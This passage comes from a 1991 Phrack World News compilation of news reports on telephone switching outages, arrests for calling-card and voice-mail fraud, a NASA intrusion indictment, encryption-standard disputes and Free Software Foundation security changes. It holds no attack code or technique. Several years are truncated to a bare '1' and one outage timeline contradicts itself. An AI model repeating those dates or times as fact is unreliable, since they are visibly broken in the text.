will go and have another beer." Flights were reported resuming by 9 p.m.
|
|||
|
EDT. Linnen said AT&T was busy Tuesday night restoring long-distance service
|
|||
|
in and out of New York City, which had been interrupted. Some international
|
|||
|
service also had been affected.
|
|||
|
|
|||
|
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
|
|||
|
|
|||
|
AT&T's Hang Ups October 19, 1991
|
|||
|
~~~~~~~~~~~~~~
|
|||
|
By John Schneidawind (USA Today - "The Big Hang-Up Phone Crash Grounds
|
|||
|
Airplanes, Raises Anger")
|
|||
|
|
|||
|
The Federal Administration Aviation has some good news for travelers who
|
|||
|
were stranded at airports, or delayed for hours, the past two days by the New
|
|||
|
York City telephone outage. If a similar phone disaster strikes next month,
|
|||
|
hardly any fliers will know the difference. That's because AT&T is close to
|
|||
|
completing installation of a network of microwave dishes that will
|
|||
|
supplement, if not replace, the phone lines AT&T uses to relay calls between
|
|||
|
air-traffic controllers in different cities. Tuesday evening, flights in and
|
|||
|
out of some of the nation's busiest airports - Kennedy, La Guardia, and
|
|||
|
Newark, N.J. - were grounded because FAA controllers couldn't communicate
|
|||
|
with one another. For much of the 1980's, land-based fiber optic lines have
|
|||
|
been slowly replacing microwave phone dishes phone companies long have used
|
|||
|
to transmit telephone calls. That's because fiber-optic wires were thought
|
|||
|
to provide clearer calls than microwave technology. Now, it's becoming
|
|||
|
apparent that sending some or most telephone calls via wireless microwave
|
|||
|
might ease the burden handled by fiber-optic cables. In addition, a
|
|||
|
microwave call could be transmitted point-to-point, bypassing an inoperative
|
|||
|
switching center when a breakdown or catastrophe occurs.
|
|||
|
|
|||
|
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
|
|||
|
|
|||
|
Computer Maker Says Tiny Software Flaw Caused Phone Disruptions
|
|||
|
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
|||
|
by Edmund L Andrews (New York Times)
|
|||
|
|
|||
|
WASHINGTON -- A manufacturer of telephone call-routing computers
|
|||
|
said that a defect in three or four lines of computer code, rather than a
|
|||
|
hacker or a computer "virus," appeared to be the culprit behind a mysterious
|
|||
|
spate of breakdowns that disrupted local telephone service for 10 million
|
|||
|
customers around the country in late June and early this month.
|
|||
|
|
|||
|
In congressional testimony Tuesday, an official of the manufacturer, DSC
|
|||
|
Communications of Plano, Texas, said all the problems had been traced to recent
|
|||
|
upgrades in its software, which had not been thoroughly tested for hidden
|
|||
|
"bugs."
|
|||
|
Although the telephone companies that experienced failures were using
|
|||
|
slightly different versions of the software, the company said, each version was
|
|||
|
infected with the flaw. "Our equipment was without question a major
|
|||
|
contributor to the disruptions," Frank Perpiglia, DSC's vice president for
|
|||
|
technology and product development, told the House telecommunications
|
|||
|
subcommittee. "We must be forthright in accepting responsibility for
|
|||
|
failure."
|
|||
|
|
|||
|
Officials at both DSC and the regional Bell companies said they could
|
|||
|
not entirely rule out the possibility of sabotage, but said the evidence points
|
|||
|
strongly to unintentional errors. The flaws caused the computers to send a
|
|||
|
flood of erroneous messages when the computer encountered routine maintenance
|
|||
|
problems.
|
|||
|
|
|||
|
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
|
|||
|
|
|||
|
TELEPHONE TECHNOLOGY QUESTIONED AFTER FAILURES
|
|||
|
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
|||
|
by Edmund L. Andrew (New York Times)
|
|||
|
|
|||
|
WASHINGTON -- Striking similarities between nearly simultaneous
|
|||
|
computer malfunctions that disrupted local telephone service on the East Coast
|
|||
|
and in Los Angeles on Wednesday have raised questions among communications
|
|||
|
experts about the reliability of advanced networks that all the Bell telephone
|
|||
|
companies are now installing.
|
|||
|
|
|||
|
The problems experienced by both Pacific Bell and the Chesapeake and
|
|||
|
Potomac Co., which serves Washington, Maryland, Virginia and parts of West
|
|||
|
Virginia, involved computer programs on advanced call-routing equipment, which
|
|||
|
uses the same new technology, one being adopted throughout the communications
|
|||
|
industry.
|
|||
|
|
|||
|
The problems, which were corrected in both areas by early evening on
|
|||
|
Wednesday, made it impossible for about nine million telephone customers to
|
|||
|
complete local telephone calls.
|
|||
|
|
|||
|
Although the origins of both malfunctions remained unclear on Thursday,
|
|||
|
the difficulties at the two companies bore a strong resemblance to a brief but
|
|||
|
massive breakdown experienced by the American Telephone and Telegraph Co.'s
|
|||
|
long-distance lines in January 1990.
|
|||
|
|
|||
|
In all three cases, a problem at one switching center quickly corrupted
|
|||
|
other switches and paralyzed much of the system. Perhaps the biggest fear,
|
|||
|
federal regulators say, is that as telephone companies link their networks more
|
|||
|
closely, malfunctions at one company can infect systems at other companies and
|
|||
|
at long-distance carriers.
|
|||
|
|
|||
|
"What you want to avoid is the situation where one system contaminates
|
|||
|
another," said an investigator at the Federal Communications Commission who
|
|||
|
insisted on anonymity.
|
|||
|
|
|||
|
"I guess the ultimate concern is that software or hardware would be
|
|||
|
deployed in a way that the corruption could be processed through entire
|
|||
|
network, and there would be no alternatives available."
|
|||
|
As the telephone companies and government regulators tried to determine
|
|||
|
more precisely on Thursday what went wrong, investigators at the communications
|
|||
|
commission said they would also look at several other questions:
|
|||
|
|
|||
|
Are there system wide problems that have gone unnoticed until now? Can
|
|||
|
telephone companies reduce risks by reducing their dependence on one type of
|
|||
|
switching equipment? Were the disruptions caused by computer operators outside
|
|||
|
the telephone companies trying to sabotage the systems?
|
|||
|
|
|||
|
Officials at both companies discounted the possibility that a computer
|
|||
|
hacker might have caused the failures, and outside experts tended to agree.
|
|||
|
|
|||
|
"There's always that possibility, but most likely it was some kind of
|
|||
|
glitch or bug in the software," said A. Michael Noll, a professor at the
|
|||
|
Annenberg School of Communications at the University of Southern California and
|
|||
|
author of several textbooks on telecommunications technology.
|
|||
|
|
|||
|
Several independent communications experts said the problems reflected
|
|||
|
the difficulty of spotting all the hidden problems in complex software before
|
|||
|
putting it into commercial use.
|
|||
|
|
|||
|
"It's very hard to simulate all the possibilities in a laboratory," said
|
|||
|
Richard Jay Solomon, a telecommunications consultant and research associate at
|
|||
|
the Massachusetts Institute of Technology. "You have to go out in the field
|
|||
|
and keep your fingers crossed."
|
|||
|
|
|||
|
As more information became available on Thursday, the two disruptions
|
|||
|
appeared to be almost identical. The problem at Chesapeake & Potomac, a
|
|||
|
subsidiary of the Bell Atlantic Corp., began as the company was increasing the
|
|||
|
traffic being routed by one of its four signal processing computers. For
|
|||
|
reasons that remain a mystery, the system began to malfunction about 11:40 a.m.
|
|||
|
|
|||
|
The computer was supposed to shut itself down, allowing the traffic to
|
|||
|
be handled by other computers. Instead, it sent out a barrage of erroneous
|
|||
|
signals, apparently overwhelming the other two computers. "It was as if bogus
|
|||
|
information was being sent," said Edward Stanley, a company spokesman.
|
|||
|
|
|||
|
The same thing seems to have occurred almost two hours later, at about 11
|
|||
|
a.m., in Los Angeles, said Paul Hirsch, a spokesman for Pacific Bell, a
|
|||
|
subsidiary of the Pacific Telesis Group.
|
|||
|
|
|||
|
Hirsch said the problem began when one of four signal transfer points
|
|||
|
signaled to the others that it was having problems. The other three computers
|
|||
|
froze after being overloaded by signals the defective computer.
|
|||
|
|
|||
|
Hirsch said his company continued to believe that the two telephone
|
|||
|
incidents were completely unrelated. "Someone wins the lottery every week,"
|
|||
|
he said. "Stranger things can happen."
|
|||
|
|
|||
|
Officials at Chesapeake and Potomac said the problems were probably
|
|||
|
unrelated. Asked if hackers could have caused the problems, Ellen Fitzgerald,
|
|||
|
a spokeswoman for Chesapeake and Potomac, said she had been assured that
|
|||
|
the system could not be penetrated. But, she added, "a few days ago I would
|
|||
|
have told you that what happened yesterday wouldn't happen."
|
|||
|
Terry Adams, a spokesman at the DSC Communications Corp., which made
|
|||
|
both systems, said company officials also discounted any connection between the
|
|||
|
failures.
|
|||
|
______________________________________________________________________________
|
|||
|
|
|||
|
|
|||
|
|
|||
|
==Phrack Inc.==
|
|||
|
|
|||
|
Volume Three, Issue Thirty-four, File #11 of 11
|
|||
|
|
|||
|
PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
|
|||
|
PWN PWN
|
|||
|
PWN Phrack World News PWN
|
|||
|
PWN PWN
|
|||
|
PWN Issue XXXIV, Part Two PWN
|
|||
|
PWN PWN
|
|||
|
PWN Compiled by Dispater PWN
|
|||
|
PWN PWN
|
|||
|
PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
|
|||
|
|
|||
|
Mind Rape or Media Rape?
|
|||
|
~~~~~~~~~~~~~~~~~~~~~~~
|
|||
|
Special Thanks: Night Ranger
|
|||
|
|
|||
|
Thursday September 26, 1991 was no ordinary day for Mind Rape, a young Arizona
|
|||
|
State college student. When he finally made it home that day, he found his home
|
|||
|
had been raided by the feds. 'They took EVERYTHING! Including my Metallica
|
|||
|
tape!' he told me. After talking to him for quite a while I learned a lot, not
|
|||
|
just about his bust but about hacking in general. He instructed me not to say
|
|||
|
anything specifically on the advice of his lawyer and the EFF, but he did want
|
|||
|
me to let the real reason he was busted be known - His electronic newsletter
|
|||
|
entitled NSA (for National Security Anarchists). Mind Rape has some very
|
|||
|
important views on hacking that the government doesn't want others to hear.
|
|||
|
Some of these views were contained in his newest and soon to be released
|
|||
|
newsletter NSA issue number five, which was confiscated of course. He was also
|
|||
|
working on a book about hacker's philosophy, which was taken too. He has not
|
|||
|
yet been charged but in the eyes of the media he is already been tried and
|
|||
|
found guilty. It is unfortunate the general public gets its information from
|
|||
|
news reports like the following because, as you can see, they can be quite
|
|||
|
misleading. Hopefully once Mind Rape gets everything straight he will continue
|
|||
|
to write his book, after all it is his constitutional right to do so, and I
|
|||
|
think it be quite informative to both the hackers of the nineties and the
|
|||
|
outside world.
|
|||
|
|
|||
|
The following is a transcript of a news report covering his story...
|
|||
|
|
|||
|
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
|
|||
|
|
|||
|
Male Announcer: That student is Donald _____ of Phoenix. Officials of
|
|||
|
LDL Long Distance believe he's one of around 20 hackers who've been ripping off
|
|||
|
their company for fun and profit. In tonight's Night Team Report we'll see how
|
|||
|
this kind of thievery adds up. The nation's telephone companies loose more
|
|||
|
than a billion dollars a year to hackers. Mark Nighten (sp?) a security
|
|||
|
director for LDL Long Distance. Last month he was poring through records like
|
|||
|
these which convinced him to believe that someone was making hundreds of
|
|||
|
computer generated phone calls to his company's 1-800 access line trying to get
|
|||
|
customer's calling card codes. He went to the Phoenix Police. They got a
|
|||
|
search warrant and traced the calls to a house near 18th Drive near Union
|
|||
|
Hills. Police went there last month and came away with a computer, software
|
|||
|
and a list of phone codes, all belonging to 19 year old Donald _____ an ASU
|
|||
|
student. With nighten suspects _____ is just one of 20 hacker on his network
|
|||
|
who can make thousands of dollars worth of calls which would wind up on other
|
|||
|
people's phone bills.
|
|||
|
|
|||
|
Mark: You can see the magnitude of this. Off of one authorization code
|
|||
|
you could have 10, maybe 150 other people...
|
|||
|
|
|||
|
Male Announcer: Lemme ask ya...How bad are you getting ripped off here?
|
|||
|
|
|||
|
Mark: We've had to have somebody on this 24 hours a day. We've been
|
|||
|
getting killed.
|
|||
|
|
|||
|
Male Announcer: Hackers often sell the codes they steal to other students.
|
|||
|
So that hundreds of students and Arizona State University and University of
|
|||
|
Arizona also could be ripping of the company. Students at Arizona State
|
|||
|
University told me today that they have not herd of LDL's troubles, but they
|
|||
|
confirmed that stolen phone codes do have a way of getting around.
|
|||
|
|
|||
|
I iz a College Student: Someone hears...ya know...about the interest and
|
|||
|
someone else knows somebody...ya know...and they tell you and you talk to
|
|||
|
them and...ya know...it's not overly expensive or anything like that.
|
|||
|
|
|||
|
Male Announcer: Dr. Dan Kneer of Arizona State University's School
|
|||
|
of Business is a nationally recognized expert on computer crime. [who?] He
|
|||
|
contends that hacking is mushrooming.
|
|||
|
|
|||
|
Dr. Dan: The problem that I see is that these people philosophically
|
|||
|
don't see this as a crime. For most of them this is an intellectual challenge.
|
|||
|
|
|||
|
Male Announcer: That challenge led Dutch students to break into a United
|
|||
|
States Army Computer during operation desert storm. And as this Japanese
|
|||
|
documentary shows, it led hackers in a New York City to use payphones to commit
|
|||
|
big time rip-offs. Now it's important to point out that Donald ______, that
|
|||
|
Arizona State University student, has not yet been charged with any crime and
|
|||
|
if he is charged he is innocent until proven guilty.
|
|||
|
|
|||
|
Female announcer: What is the penalty for hacking?
|
|||
|
|
|||
|
Male Announcer: Just for getting into a system when you're not supposed to
|
|||
|
can be up to a year and a half in prison. But if there is criminal intent to
|
|||
|
steal, to rip-off that system, the penalty can be as high as 10 years in jail
|
|||
|
and a $150,000.00 fine.
|
|||
|
|
|||
|
_______________________________________________________________________________
|
|||
|
|
|||
|
Computer Hacker Gets Probation September 26, 1991
|
|||
|
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
|||
|
Special Thanks: Flaming Carrot (Pittsburgh Post-Gazette)
|
|||
|
|
|||
|
A Mt. Lebanon woman who was able to make thousands of free long-distance
|
|||
|
telephone calls by breaking into voice mail boxes with a touch tone telephone
|
|||
|
has been placed on 10 years probation. Last Friday, Common Pleas Judge Robert
|
|||
|
E. Dauer ordered Andrea Gerulis, 20, of Castle Shannon Boulevard to make
|
|||
|
restitution of $4,300 to Magee Womens Hospital and $2,516 to Pittsburgh
|
|||
|
Cellular Telephone Co.
|
|||
|
|
|||
|
Gerulis, a Mt. Lebanon High School graduate, was a computer hacker who
|
|||
|
entered telephone computer systems illegally so that she could make telephone
|
|||
|
calls without paying for the service. Mt. Lebanon police Detective John L.
|
|||
|
Michalec posed as a computer hacker and spent nine months investigating her
|
|||
|
activities, which were done by dialing codes on a touch-tone telephone.
|
|||
|
|
|||
|
After a non-jury trial in May, Dauer convicted her of two counts of theft
|
|||
|
of services and two counts of unlawful use of computers. Assistant District
|
|||
|
Attorney Thaddeus A. Dutkowski recommended probation because he didn't want
|
|||
|
Gerulis to go to jail, where she could teach inmates how to commit crimes with
|
|||
|
a telephone. If she were incarcerated, she would have the largest classroom
|
|||
|
environment she could hope for, Dutkowski said.
|
|||
|
|
|||
|
Dauer agreed that inmates already know too much about committing crimes
|
|||
|
with telephones. Gerulis told Dauer that she was sorry for what she did, that
|
|||
|
when she started, she was doing it for fun. She was also ordered to continue
|
|||
|
psychological counseling.
|
|||
|
_______________________________________________________________________________
|
|||
|
|
|||
|
More Archaic Government Regulations Proposed
|
|||
|
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
|||
|
Special Thanks: Stainless Steal Provider (New York Times)
|
|||
|
|
|||
|
The federal government said Thursday that it would introduce a standard
|
|||
|
for authenticating electronic data later this summer, but the announcement
|
|||
|
prompted an angry reaction from one of the leading private providers of software
|
|||
|
that protects computer data.
|
|||
|
|
|||
|
The company, RSA Data Security Inc. of Redwood City, Calif., said the
|
|||
|
government had failed to address fears about the possibility of a secret "trap
|
|||
|
door," which would permit intelligence and law-enforcement agencies to look at
|
|||
|
private data.
|
|||
|
|
|||
|
The issue of providing special mechanisms to permit government access to
|
|||
|
private information has caused a growing public debate recently.
|
|||
|
|
|||
|
Earlier this year an anti-terrorism bill introduced in Congress called on
|
|||
|
the computer and telecommunication industries to permit federal agencies to
|
|||
|
look at private data. But the statement was later dropped from the bill after
|
|||
|
extensive public opposition.
|
|||
|
|
|||
|
Government officials said that it would be possible for technical experts
|
|||
|
to examine the standard when it is released this summer and they could decide
|
|||
|
for themselves whether there were any shortcomings in the design of the
|
|||
|
standard.
|
|||
|
|
|||
|
"It will be openly published and people can inspect it to their heart's
|
|||
|
content," said James H. Burrows, head of the computer systems laboratory at the
|
|||
|
National Institute of Standards and Technology.
|
|||
|
|
|||
|
He added that the new standard was not intended to encrypt computer data,
|
|||
|
and that the government would continue to rely on an earlier technology known
|
|||
|
as the Data Encryption Standard to actually hide information from potential
|
|||
|
electronic eavesdroppers.
|
|||
|
|
|||
|
Burrows said there was a project under way to develop a successor to that
|
|||
|
standard, but that it was years away from completion.
|
|||
|
______________________________________________________________________________
|
|||
|
|
|||
|
Computer Whiz Accused Of Illegal Access and Mischief September 25, 1991
|
|||
|
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
|||
|
by Peter G. Chronis (The Denver Post Page 1 "NASA vs. Hobbyist")
|
|||
|
|
|||
|
An Aurora computer hobbyist who allegedly used a personal computer and his
|
|||
|
home phone to penetrate NASA computers hacked off Uncle Sam enough to be
|
|||
|
indicted on seven federal counts yesterday. Richard G. Wittman, 24, the
|
|||
|
alleged "hacker," was accused of two felonies, including gaining unauthorized
|
|||
|
access to NASA computers to alter, damage, or destroy information, and five
|
|||
|
misdemeanor counts of interfering with the government's operation of the
|
|||
|
computers. Wittman allegedly got into the NASA system on March 7, June 11,
|
|||
|
June 19, June 28, July 25, July 30, and Aug. 2, 1.
|
|||
|
|
|||
|
Bob Pence, FBI chief in Denver, said Wittman used a personal computer in
|
|||
|
his home and gained access to the NASA systems over telephone lines. The
|
|||
|
investigation, which took more than a year, concluded that Wittman accessed the
|
|||
|
NASA computer system and agency computers at the Marshall Space flight Center in
|
|||
|
Huntsville, Alabama, and the Goddard Space Flight Center in Greenbelt,
|
|||
|
Maryland.
|
|||
|
|
|||
|
The NASA computers are linked to a system called Telenet, which allows
|
|||
|
qualified people to access government data bases. A user name and password
|
|||
|
are required to reach the NASA computers. Federal sources declined to reveal
|
|||
|
more information because the complex case involves "sensitive material."
|
|||
|
|
|||
|
Wittman, a high-school graduate, apparently hadn't worked in the computer
|
|||
|
industry and held a series of odd jobs. The felony counts against him each
|
|||
|
carry a possible five-year prison term and $250,000 fine.
|
|||
|
_______________________________________________________________________________
|
|||
|
|
|||
|
Security Increases
|
|||
|
~~~~~~~~~~~~~~~~~
|
|||
|
Special Thanks: Stainless Steal Provider (New York Times)
|
|||
|
|
|||
|
The foundation was started by Richard Stallman, who was awarded a MacArthur
|
|||
|
Foundation fellowship in 1. While mainstream software companies
|
|||
|
have prohibited users from freely copying their programs, Stallman, who is
|
|||
|
widely respected for developing computer languages and software editing tools,
|
|||
|
has argued that information is not the same as other commodities and should be
|
|||
|
shared without cost.
|
|||
|
|
|||
|
His password has been widely known among network users because he has
|
|||
|
refused to keep it secret. He is bitter about the changes that have
|
|||
|
accompanied the coming of age of computer networks.
|
|||
|
|
|||
|
Last month, after security was increased at the foundation and many users
|
|||
|
were stripped of their guest privileges, Stallman said he considered giving up
|
|||
|
his quest.
|
|||
|
|
|||
|
In the end, he decided that the cause of creating free software was too
|
|||
|
important to abandon, but he said he feels like a pariah. "Since I won't agree
|
|||
|
to have a real password, I will only be able to log in on the 'inside'
|
|||
|
machines,"
|
|||
|
he wrote in an electronic message in response to a reporter's query.
|
|||
|
|
|||
|
"I still feel partly ashamed of participating in this. I've been forced to
|
|||
|
choose between two principles, both of which are so important to me that I
|
|||
|
won't accept the loss of either of them."
|
|||
|
|
|||
|
Idealists like Stallman and Ted Nelson, the author of the cult classic
|
|||
|
"Computer Lib," hoped that the computer revolution wouldn't be like the
|
|||
|
industrial revolution. This time the wealth -- information -- would be free to
|
|||
|
everyone and instant communication would break down the barriers between rich
|
|||
|
and poor and remake mankind.
|
|||
|
|
|||
|
Marvin Minsky, a computer science professor at MIT, said that for 15
|
|||
|
years, beginning in 1963, researchers at the school lived in a paradise,
|
|||
|
sharing computers and networks before a system of password protection was
|
|||
|
installed. Now that has changed. "It's sad," he said.
|
|||
|
|
|||
|
"But Richard Stallman is living in a dream world. He has this view that
|
|||
|
his idea of computer ethics will prevail. But it's not going to happen this
|
|||
|
year or next."
|
|||
|
|
|||
|
Instead of finding community on computer networks, many users are now
|
|||
|
confronted with virus invasions and information theft, leading to the same
|
|||
|
sense of alienation and fear felt by residents of large cities.
|
|||
|
|
|||
|
"At first I thought this was Marshall McLuhan's global village coming to
|
|||
|
reality," said Neil Harris, a manager at General Electric Information Services
|
|||
|
Co., which sets up computer conferences and sells information to about 200,000
|
|||
|
members around the world.
|
|||
|
|
|||
|
"But it's not that at all. It's a lot of people connecting in hundreds of
|
|||
|
small communities based around highly specific interests."
|
|||
|
|
|||
|
Steven Levy, who has written about the early days of computing at MIT, said
|
|||
|
that the demise of the Free Software Foundation's open door policy was
|
|||
|
inevitable.
|
|||
|
|
|||
|
"When you pass the plate around in church you don't expect people to steal
|
|||
|
from it," he said. "But sooner or later everyone knows that the plate is
|
|||
|
unguarded, and there are always people who don't care about the church. The
|
|||
|
question is how far do you go to protect it? Do you lock the church or do you
|
|||
|
send an armed guard around with the plate?"
|
|||
|
______________________________________________________________________________
|
|||
|
|
|||
|
PWN Quicknotes
|
|||
|
~~~~~~~~~~~~~
|
|||
|
1. On June 12, 1991, Sirhackalot's equipment was confiscated by the Southern
|
|||
|
Bell and the FBI without any charges being filed. Neither the FBI nor
|
|||
|
Southern Bell bothered to explain why they were in his home and taking his
|
|||
|
personal possessions. Again neither party could tell Sirhackalot what he
|
|||
|
supposedly did to bring both agency's to his doorstep. Also busted were
|
|||
|
Mr.Doo and The Imortal Phreak. [Special Thanks: The Marauder (404)]
|
|||
|
_______________________________________________________________________________
|
|||
|
|
|||
|
2. Bill Cook is no longer an assistant United States Attorney in Chicago. It
|
|||
|
is unknown how he left his position. Basic questions go unanswered. Did
|
|||
|
he quit or was fired? If he was fired, we'd like to know exactly why.
|
|||
|
_______________________________________________________________________________
|
|||
|
|
|||
|
3. Wanted: Targets of Operation Sun Devil
|
|||
|
|
|||
|
Computer Professionals for Social Responsibility (CPSR) is pursuing a
|
|||
|
lawsuit against the Secret Service seeking the release of information
|
|||
|
concerning Operation Sun Devil. In recently filed court papers, the
|
|||
|
agency claims that the information cannot be disclosed because, among
|
|||
|
other reasons, disclosure would violate the privacy of those individuals
|
|||
|
who are the targets of the investigation. This argument can be overcome
|
|||
|
if CPSR obtains signed releases from those individuals. CPSR is
|
|||
|
requesting the cooperation of anyone who was the subject of a Sun Devil
|
|||
|
raid on or about May 7, 1. We are prepared to enter into an attorney-
|
|||
|
client relationship with individuals responding to this request, so that
|
|||
|
confidentiality will be assured.
|
|||
|
|
|||
|
Please respond ASAP to:
|
|||
|
|
|||
|
David Sobel
|
|||
|
CPSR Legal Counsel
|
|||
|
(202) 544-9240
|
|||
|
dsobel@washofc.cpsr.org
|
|||
|
_______________________________________________________________________________
|
|||
|
|
|||
|
4. Recently Microsoft discovered it was the victim of trespassing. A
|
|||
|
security guard noticed two people playing volleyball on the premises and
|
|||
|
knew that they did not work for Microsoft. The officer approached the
|
|||
|
volleyball players and asked them to leave. The trespassers left. Later
|
|||
|
someone asked the security guard how he knew that the people playing
|
|||
|
volleyball were not Microsoft employees. He replied, "They had tans."
|
|||
|
[Special Thanks: Psychotic Surfer]
|
|||
|
_______________________________________________________________________________
|
|||
|
|
|||
|
|